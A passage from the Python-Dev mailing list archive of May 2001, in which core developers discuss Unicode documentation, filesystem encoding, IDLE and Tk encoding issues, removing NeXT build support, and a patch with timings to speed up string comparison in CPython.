Here are some more options:

* sort the items before creating the encoding table from the
  decoding one (makes the mapping stable)

* map keys which have multiple mappings in the encoding table
  to None -- this causes their usage to raise an exception
  (undefined mapping)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Mon May 14 10:15:43 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:15:43 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
Message-ID: <3AFFA23F.248517E3@lemburg.com>

Tim Peters wrote:
> 
> [Mark Hammond]
> > ...
> > Where should the "real" documentation go?  It seems maybe we need a
> > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> > like:
> >
> > 6.1.x - Unicode and the file system
> >   - general discussion.
> >   - Windows specific
> >   - Mac specific should that appear.
> >   - OS' with no special support (ie, "the rest")
> >
> > Does that make sense?
> 
> So far is it goes, yes.  I think the manual desperately needs a Unicode
> section for other reasons, though:  from traffic on c.l.py, it's clear that
> few people can figure out how to do *anything* with Unicode now unless their
> first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
> <wink>).  There's no overview and there are no examples.  The primary string
> method doesn't even mention Unicode (here paraphrasing questions that pop
> up):
> [...]

True. The main source of documentation for Unicode still is the
proposal itself (Misc/unicode.txt). It needs some reordering
and a few examples, but does contain all the information needed
to grasp what the implementation intends and how it works.

If that's still not enough, there are numerous doc-strings in
the codecs.py module, more technical docs in the API reference 
and finally the unicodeobject.h header file itself.

Another source for documentation and examples is the i18n-sig
page on python.org.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack@oratrix.nl  Mon May 14 10:55:26 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 14 May 2001 11:55:26 +0200
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl>

I'm not too thrilled with the way the filename encoding stuff was done, with a 
global var declared in posixmodule.c which is then used by bltinmodule.c. It 
took me quite a while to figure out why my builds were failing, and how to fix 
it. And I think other minority platforms may have the same problem, so maybe 
it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an 
include file, and do the initialization in a more "common" place?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From fredrik@pythonware.com  Mon May 14 11:18:49 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Mon, 14 May 2001 12:18:49 +0200
Subject: [Python-Dev] State of curses tutorial?
References: <20010514012017.A6971@thyrsus.com>
Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff>

eric wrote:
>
> 1. Somebody seems to have removed Andrew Kuchling's namne from it.  If it
>    was Andrew, that's OK -- but the reference in the latest version of the
>    library docs still cites him.

that would be either you (who reworked the document), or andrew
(who checked in your changes).  looks like fred has already fixed it:

    Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake

    Use appropriate markup for multiple authors; LaTeX's \author is not
    additive; the second occurrance was causing the first author to be dropped.

> 2. I don't seem to have the TeX source anymore.  Where can I download it?

it's in the py-howto CVS tree:

    http://sourceforge.net/projects/py-howto

Cheers /F


From loewis@informatik.hu-berlin.de  Mon May 14 12:29:21 2001
From: loewis@informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:29:21 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com>
Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de>

> I have a bug report assigned to myself which indicates similar
> problems with _tkinter and Tk/Tcl. There were other problem
> reports on the German Python mailing list going in the same
> direction too.
> 
> The basic problem seems to be that Tk/Tcl applies too much
> magic to the text widget contents in order to find out the
> used encoding and this can easily cause the whole encoding
> mechanism to fail.

This is actually a different problem. In this scenario here, the user
types non-ASCII character into a text widget, then _tkinter returns a
Unicode object (IMO rightfully so). In the other problem, the Python
program puts a byte string into a text widget, the user enters some
more characters, and _tkinter returns a byte string which does not
follow any encoding.

> A Tk/Tcl expert should really look into this and fix _tkinter.c
> to aid Tk/Tcl in not mixing up the encodings (e.g. it would
> probably be a good idea to recode Python 8bit-strings into
> whatever encoding Tk/Tcl assumes as default).

Again, this is not the issue here: Both _tkinter and Tk behave
absolutely correct IMO. The question is how IDLE should deal with it.

Regards,
Martin


From loewis@informatik.hu-berlin.de  Mon May 14 12:41:26 2001
From: loewis@informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:41:26 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message
 from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com>
Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>

> Postscript: using cut and paste, I *can* enter "s=3D'=E4=F6'" in IDLE at =
the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

Perhaps the Tcl version? That sounds like the issue that Marc talked
about: Tk behaves differently when text is entered programmatically
(and perhaps through cut-n-paste), as compared to text entered through
the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
Solaris 8 still gives me the UnicodeError.

Regards,
Martin


From MarkH@ActiveState.com  Mon May 14 13:20:43 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 22:20:43 +1000
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKELCDMAA.MarkH@ActiveState.com>

> I'm not too thrilled with the way the filename encoding stuff was
> done, with a

My apologies.  I did try and publicise the patch as much as possible.  A
misguided attempt at a low-impact change :(  I have checked in the changes
you suggest.

Mark.


From barry@digicool.com  Mon May 14 13:54:59 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 08:54:59 -0400
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
 <3AFFA23F.248517E3@lemburg.com>
Message-ID: <15103.54691.560967.853132@anthem.wooz.org>

>>>>> "M" == M  <mal@lemburg.com> writes:

    M> True. The main source of documentation for Unicode still is the
    M> proposal itself (Misc/unicode.txt). It needs some reordering
    M> and a few examples, but does contain all the information needed
    M> to grasp what the implementation intends and how it works.

As a first step, why not PEP-ify that document, much like as has been
done with the DB-API (version 1 & 2)?  It can be an informational PEP.

-Barry


From esr@thyrsus.com  Mon May 14 16:11:57 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 11:11:57 -0400
Subject: [Python-Dev] State of curses tutorial?
In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200
References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff>
Message-ID: <20010514111157.C10920@thyrsus.com>

Fredrik Lundh <fredrik@pythonware.com>:
> it's in the py-howto CVS tree:
> 
>     http://sourceforge.net/projects/py-howto

What module is the Python-HOWTO in?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The best we can hope for concerning the people at large is that they be
properly armed."
        -- Alexander Hamilton, The Federalist Papers at 184-188


From skip@pobox.com (Skip Montanaro)  Mon May 14 16:54:54 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Mon, 14 May 2001 10:54:54 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
 <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
Message-ID: <15103.65486.61021.328424@beluga.mojam.com>

    Martin> That *should* work, except that it also has its 'methods' field
    Martin> where tp_traverse would go, and its class_flags field where
    Martin> tp_clear would go.

Okay, so I'm completed confused now.  I extended the definition of
ECTypeType to include this after the doc string slot:

      (traverseproc)0,              /* tp_traverse */
      (inquiry)0,                   /* tp_clear */
      (richcmpfunc)0,               /* rich comparisons */
      0L,                           /* weak reference enabler */

    #ifdef COUNT_ALLOCS
      /* these must be last */
      0,                            /* tp_alloc */
      0,                            /* tp_free */
      0,                            /* tp_maxalloc */
      (struct _typeobject *)0,      /* tp_next */
    #endif

When I looked at the definition of ECType, after the doc string I saw

      METHOD_CHAIN(ExtensionClass_methods)

as Martin indicated.  I can't simply insert the same zeroes at the end of
the ECType def'n as I did at the end of the ECTypeType definition.  Where
does this METHOD_CHAIN thing go?  I looked at the def'n of struct
_typeobject in Include/object.h but didn't see a slot that looked suitable.

FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
I get 

    Fatal Python error: UNREF invalid object

when I run my failing script.  This is with and without making any changes
to ECType or ECTypeType.

Skip


From sdm7g@Virginia.EDU  Mon May 14 18:04:56 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Mon, 14 May 2001 13:04:56 -0400 (EDT)
Subject: [Python-Dev] deprecated platforms
Message-ID: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>

Jack asked me about:

https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470

which concerns removing the support for --with-next-framework from 
the build procedure. 

I'm all for removing it: 
 it's broken for OSX,
 if it worked, it doesn't do the whole job ( I think framework 
   support should eventually be added for OSX with a separate
   post-build script -- a real framework should encapsulate 
   all of the python libs, docs and headers files in one bundle. ) 
 nobody seems to know if it still works on Next or OpenStep.

 However, I said I thought there ought to be some sort of official
procedure for removing platform support. 
 
 This doesn't seem to be addressed in either PEP 4 (Deprecation
of Standard Modules) or PEP 5 (Guidelines for Language Evolution).

 I don't think it needs to be as involved a process as PEP 4 or 5 --
it's a more reversable decision than removing a feature from the
language.  Although, removing a platform dependent feature -- 
like in the long discussion about case sensitivity -- may be a 
bigger deal. 
 But I'm really thinking more about things like the Next case -- 
where there are build options and #ifdefs that, as far as we know,
haven't been tested in several versions. ( Believe it or not, there
are still folks hanging dearly onto their black NeXT cubes, and finding
the useful -- but I have no idea if any of them are using Python, 
and there's lots of users out there whom we only hear from when they
discover a problem. ) 

 Perhaps there should be some sort of "Last Call for Platform Saviour" :
if nobody steps forward who is willing to do test builds on that 
platform, support may be removed if maintaining it is getting in the way. 
 

 Any thougts or opinions on this? 

 Are there any other platforms where this might become an issue ? 
 If this looks like it's unlikely to crop up again, then maybe we
  don't need to bother with a 'policy'. 

 What about support for particular compilers and build environments: 
 (Borland C on Windows and MPW on Mac are two examples of "minority" 
   compilers.) 


BTW: As I've though more about this particular issue (--with-next-framework) 
 I don't think it's as big an issue -- removing that switch isn't going
 to break the build entirely (I think!). Pulling out all of the 
 #ifdefs for Next would be a larger issue, but that hasn't been proposed
 (yet). If the consensus is that this isn't a big enough issue, in general,
 to need an official policy, then I vote to pull it out and see if anyone
 screams. 

 
-- Steve Majewski


From guido@digicool.com  Mon May 14 21:53:26 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 15:53:26 -0500
Subject: [Python-Dev] deprecated platforms
In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400."
 <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>
References: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>
Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com>

I can't really add much to this discussion, since I have *absolutely*
*no* *idea* what kind of framework we're talking about here...

I agree with Steve that we shouldn't be too scared of removing support
for obsolete platforms.  People hanging on to obsolete platforms may
as well hang on to obsolete Python versions...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 20:40:21 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 21:40:21 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
 <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com>
Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>

> Okay, so I'm completed confused now.  I extended the definition of
> ECTypeType to include this after the doc string slot:
> 
>       (traverseproc)0,              /* tp_traverse */
>       (inquiry)0,                   /* tp_clear */
>       (richcmpfunc)0,               /* rich comparisons */
>       0L,                           /* weak reference enabler */
> 
>     #ifdef COUNT_ALLOCS
>       /* these must be last */
>       0,                            /* tp_alloc */
>       0,                            /* tp_free */
>       0,                            /* tp_maxalloc */
>       (struct _typeobject *)0,      /* tp_next */
>     #endif

Why did you do that? ECTypeType has the right data type
(PyTypeObject). It is the instances of PyExtensionClass that are
troubling

> When I looked at the definition of ECType, after the doc string I saw
> 
>       METHOD_CHAIN(ExtensionClass_methods)
> 
> as Martin indicated.  I can't simply insert the same zeroes at the end of
> the ECType def'n as I did at the end of the ECTypeType definition.  

Of course not. ECType is of type PyExtensionClass, not of type
PyTypeObject. Those are similar, but not equal.

> Where does this METHOD_CHAIN thing go?  I looked at the def'n of
> struct _typeobject in Include/object.h but didn't see a slot that
> looked suitable.

Just have a look at ExtensionClass.h instead.

> FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
> I get 
> 
>     Fatal Python error: UNREF invalid object
> 
> when I run my failing script.  This is with and without making any changes
> to ECType or ECTypeType.

BTW, what version of PyGtk did you try to compile? I've tried the
0.7.0-dont-use, and it can run examples/testgtk without major problems
(the example did need some updates, since it is apparently outdated).
My Gtk version was 1.2, on Linux.

In any case, I think you need to analyse this in a debugger.

Regards,
Martin


From tim@digicool.com  Mon May 14 21:12:44 2001
From: tim@digicool.com (Tim Peters)
Date: Mon, 14 May 2001 16:12:44 -0400
Subject: [Python-Dev] Comparison speed
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>

Here's a simple test program:

from time import clock

indices = [1] * 100000

def doit():
    s = clock()
    i = 0
    while i < 100000:
        "ab" < "cd"
        i += 1
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

And here's output from 2.0, 2.1 and current CVS:

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.107
0.106
0.109
0.106
0.106
0.106
0.106
0.106
0.105
0.106

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.118
0.118
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

C:\Code\python\dist\src\PCbuild>python timech.py
0.119
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

So "something happened" between 2.0 and 2.1 to slow this overall by 10%.
string_compare hasn't changed, so rich comparisons are a good guess.  Note
that the more obvious timing loop obscures the issue:

def doit():
    s = clock()
    for i in indices:
        "ab" < "cd"
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.070
0.069
0.069
0.070
0.069
0.069
0.069
0.070
0.069
0.069

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.076
0.076
0.076
0.076
0.076
0.077
0.076
0.076
0.076
0.076

C:\Code\python\dist\src\PCbuild>python timech.py
0.069
0.070
0.070
0.069
0.069
0.070
0.070
0.069
0.070
0.069

for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out
the comparison slowdown.

If we try it with a type of comparison that avoids the richcmp machinery
(int < int is special-cased in ceval), current CVS is actually faster than
2.0:

def doit():
    s = clock()
    for i in indices:
        2 < 3
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.056
0.056
0.056
0.056
0.055
0.056
0.058
0.058
0.055
0.056

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.059
0.059
0.059
0.060
0.060
0.059
0.059
0.060
0.059
0.059

C:\Code\python\dist\src\PCbuild>python timech.py
0.053
0.052
0.052
0.053
0.053
0.052
0.052
0.054
0.052
0.053

C:\Code\python\dist\src\PCbuild>

This also shows that 2.1 was a bit more slothful than 2.0 for some reason
other than richcmps.

These were all done on a Win2K box; timings vary too much on a Win9x box to
be useful.

Anybody care to take a stab at making the new richcmp and/or coerce code
ugly again?

speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 21:34:35 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 22:34:35 +0200
Subject: [Python-Dev] deprecated platforms
Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de>

> I'm all for removing it:

So am I. There are way too many build options for build Python on the
Mac-like systems already (e.g. after that change, you still have
--with-dyld - or rather the option of still building .o extensions).

If it is clearly broken (even if only on OSX), it should be
removed. Anybody interested in the flag would need to make it work
correctly before it can be revived.

> However, I said I thought there ought to be some sort of official
> procedure for removing platform support. 

I don't think such a procedure is necessary. It is not that any end
user would be concerned; building Python is an activity of system
administrators. The other PEPs are there because changing the language
or removing modules might break *applications* that used to work after
an upgrade of Python. With removed platform support, nothing will
break - installations would continue to use the last release that did
support that platform.

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 23:06:57 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 00:06:57 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

When stepping through the code, I also missed support for the
relationship between identity and equality. E.g. in
PyObject_RichCompare, I'd expect

  if (v == w) {
     switch (op)
     case Py_EQ:case Py_LE:case Py_GE:
        Py_INCREF(Py_True);
        return Py_True;
     case Py_NE:case Py_LT:case Py_GT:
        Py_INCREF(Py_False);
        return Py_False;
     }
  }

That would not help in your case, of course. I don't even know how
frequent comparing identical objects is in real life - but this is
something that PyObject_Compare has that PyObject_RichCompare
currently doesn't.

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 22:55:39 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 23:55:39 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

Hi Tim,

With CVS Python, 1000000 iterations, and a for loop, I currently got

0.780
0.770
0.770
0.780
0.770
0.770
0.770
0.780
0.770
0.770

With the patch below, I get

0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720
0.710
0.710

The idea is to let strings support richcmp; this also allows some
optimization for the EQ case.

Please let me know what you think.

Martin

Index: stringobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v
retrieving revision 2.115
diff -u -r2.115 stringobject.c
--- stringobject.c	2001/05/10 00:32:57	2.115
+++ stringobject.c	2001/05/14 21:36:36
@@ -596,6 +596,51 @@
 	return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0;
 }
 
+/* In the signature, only a is guaranteed to be a PyStringObject.
+   However, as the first thing in the function, we check that b
+   is of that type also.  */
+
+static PyObject*
+string_richcompare(PyStringObject *a, PyStringObject *b, int op)
+{
+	int c;
+	PyObject *result;
+	if (!PyString_Check(b)) {
+		result = Py_NotImplemented;
+		goto out;
+	}
+	if (op == Py_EQ) {
+		if (a->ob_size != b->ob_size) {
+			result = Py_False;
+			goto out;
+		}
+#ifdef CACHE_HASH
+		if (a->ob_shash != b->ob_shash
+		    && a->ob_shash != -1 
+		    && b->ob_shash != -1) {
+			result = Py_False;
+			goto out;
+		}
+#endif
+	}
+	c = string_compare(a, b);
+	switch (op) {
+	case Py_LT: c = c <  0; break;
+	case Py_LE: c = c <= 0; break;
+	case Py_EQ: c = c == 0; break;
+	case Py_NE: c = c != 0; break;
+	case Py_GT: c = c >  0; break;
+	case Py_GE: c = c >= 0; break;
+	default:
+		result = Py_NotImplemented;
+		goto out;
+	}
+	result = c ? Py_True : Py_False;
+  out:
+	Py_INCREF(result);
+	return result;
+}
+
 static long
 string_hash(PyStringObject *a)
 {
@@ -2409,6 +2454,12 @@
 	&string_as_buffer,	/*tp_as_buffer*/
 	Py_TPFLAGS_DEFAULT,	/*tp_flags*/
 	0,		/*tp_doc*/
+	0,		/*tp_traverse*/
+	0,		/*tp_clear*/
+	(richcmpfunc)string_richcompare,	/*tp_richcompare*/
+	0,		/*tp_weaklistoffset*/
+	0,		/*tp_iter*/
+	0,		/*tp_iternext*/
 };
 
 void


From gstein@lyra.org  Mon May 14 23:17:56 2001
From: gstein@lyra.org (Greg Stein)
Date: Mon, 14 May 2001 15:17:56 -0700
Subject: [Python-Dev] Comparison speed
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>
Message-ID: <20010514151755.P1374@lyra.org>

On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote:
>...
> Anybody care to take a stab at making the new richcmp and/or coerce code
> ugly again?
> 
> speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim

Euh... isn't Guido's preference for cleanliness over speed?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From tim@digicool.com  Mon May 14 23:35:33 2001
From: tim@digicool.com (Tim Peters)
Date: Mon, 14 May 2001 18:35:33 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010514151755.P1374@lyra.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIGCAAA.tim@digicool.com>

[Greg Stein]
> Euh... isn't Guido's preference for cleanliness over speed?

So do both.


From greg@cosc.canterbury.ac.nz  Tue May 15 02:42:49 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 15 May 2001 13:42:49 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>:

> I also missed support for the
> relationship between identity and equality.

That would severely restrict the semantics that could be given
to the comparison operators by overloading them.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@digicool.com  Tue May 15 03:40:33 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 21:40:33 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST."
 <20010514151755.P1374@lyra.org>
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>
 <20010514151755.P1374@lyra.org>
Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com>

> > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim
> 
> Euh... isn't Guido's preference for cleanliness over speed?

Yeah, Tim & I have developed a nice good-cop-bad-cop routine about
this. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Tue May 15 04:36:42 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 14 May 2001 23:36:42 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> When stepping through the code, I also missed support for the
> relationship between identity and equality. E.g. in
> PyObject_RichCompare, I'd expect
>
>   if (v == w) {
>      switch (op)
>      case Py_EQ:case Py_LE:case Py_GE:
>         Py_INCREF(Py_True);
>         return Py_True;
>      case Py_NE:case Py_LT:case Py_GT:
>         Py_INCREF(Py_False);
>         return Py_False;
>      }
>   }
>
> That would not help in your case, of course. I don't even know how
> frequent comparing identical objects is in real life - but this is
> something that PyObject_Compare has that PyObject_RichCompare
> currently doesn't.

Guido insisted (with cause <wink>) on these four pairs as being equivalent:

    x <  y  iff  y >  x
    x <= y       y >= x
    x == y       y == x
    x != y       y != x

but beyond that, in the presence of rich comparisons, agreed not to make any
other assumptions about what those pixel-bags "mean".  In particular, there's
no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies
"x != y", etc.

Applying that to the above leaves you with nothing but

   if (v == w && op == Py_EQ) /* then return Py_True */

Which is about all PyObject_Compare's

	if (v == w)
		return 0;

assumes too.  So I don't see much future in that.

[later, a patch to fill in the richcmp slot for strings]
> +static PyObject*
> +string_richcompare(PyStringObject *a, PyStringObject *b, int op)
> +{
> +	int c;
> +	PyObject *result;
> +	if (!PyString_Check(b)) {
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	if (op == Py_EQ) {
> +		if (a->ob_size != b->ob_size) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#ifdef CACHE_HASH
> +		if (a->ob_shash != b->ob_shash
> +		    && a->ob_shash != -1
> +		    && b->ob_shash != -1) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#endif
> +	}
> +	c = string_compare(a, b);
> +	switch (op) {
> +	case Py_LT: c = c <  0; break;
> +	case Py_LE: c = c <= 0; break;
> +	case Py_EQ: c = c == 0; break;
> +	case Py_NE: c = c != 0; break;
> +	case Py_GT: c = c >  0; break;
> +	case Py_GE: c = c >= 0; break;
> +	default:
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	result = c ? Py_True : Py_False;
> +  out:
> +	Py_INCREF(result);
> +	return result;

[and that yields about an 8% speedup in the "<" case]

That looks on the right track, but maybe at the wrong level:  why is it
necessary?  That is, the bulk of the "smarts" here in the switch stmt are
type-independent:  if there's no specific implementation of individual
comparisons, but there is a tp_compare, then the switch stmt applies verbatim
to *any* such type.  Do we have to fill in the richcmp slot for everything to
get Python to realize that?  I mean "just about everything", too:  while,
e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min
etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then,
but thru the general comparison routines).

The "speed problem" appears to be:

+ COMPARE_OP calls cmp_outcome()
+   which calls PyObject_RichCompare()
+     which calls do_richcmp()
+       which calls try_rich_compare() (unsuccessfully now,
                                        successfully after your patch)
          which fails to find a richcmp slot on either operand (now)
          so says "not implemented"
+       then calls try_3way_to_rich_compare()
+         which calls try_3way_compare()
+            which finally calls the tp_compare slot
+            then runs exactly the same
   		switch (op) {
		case Py_LT: c = c <  0; break;
		case Py_LE: c = c <= 0; break;
		case Py_EQ: c = c == 0; break;
		case Py_NE: c = c != 0; break;
		case Py_GT: c = c >  0; break;
		case Py_GE: c = c >= 0; break;
		}
        	result = c ? Py_True : Py_False;
             switch as your patch

and things unwind.  So we've got 7 function calls there, not even counting
calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine
instructions that actually do the compare <wink>.

You got an 8% speedup for one type by tricking the switch stmt into appearing
3 calls earlier.  What if the implementation were smarter, and did it for
*all* relevant types even a call or two before that?

I don't see any reason "in principle" that compares couldn't be much faster,
and via the usual gimmicks:  bigger, smarter functions that remember what
they've already determined so don't need to figure it out over and over
again, and fast paths to favor common cases at the expense of comparisons
from Mars.  One thing to note here:  the workhorse comparisons are "like
strings" in having no *logical* need for richcmps at all; and the objects for
which richcmps were introduced were numerical arrays, which can much better
afford a longer code path to *find* them (one matrix compare will trigger
many vanilla element compares anyway, so even for arrays it's much more
important that the *latter* be fast).  The code now is approximately
backwards in that respect (it takes gobs of work before we even *look* for a
cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're
doing an explict "cmp" compare, the code now tries to *simulate* cmp first
via a long sequence of richcmp calls!).

I don't have time to uglify this code, but Python would benefit from it.

and-no-matter-what-guido-may-say<wink>-ly y'rs  - tim


From tim.one@home.com  Tue May 15 04:50:00 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 14 May 2001 23:50:00 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>

[Guido]
> Index: spam.c
> ...

Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
with "spam" in the subject line, and my mail reader moves that to a special
spam folder upon delivery.  So far this is the one and only incoming email
it's moved.  Many solicitations to help foreign nationals move large sums of
money out of their country have gotten through, along with a number of
intriguing promises that I can easily increase the size of my penis -- like I
have any need for either of those <wink>.

reads-every-spam-he-gets-top-to-bottom-ly y'rs  - tim


From esr@thyrsus.com  Tue May 15 04:53:38 2001
From: esr@thyrsus.com (Eric S. Raymond)
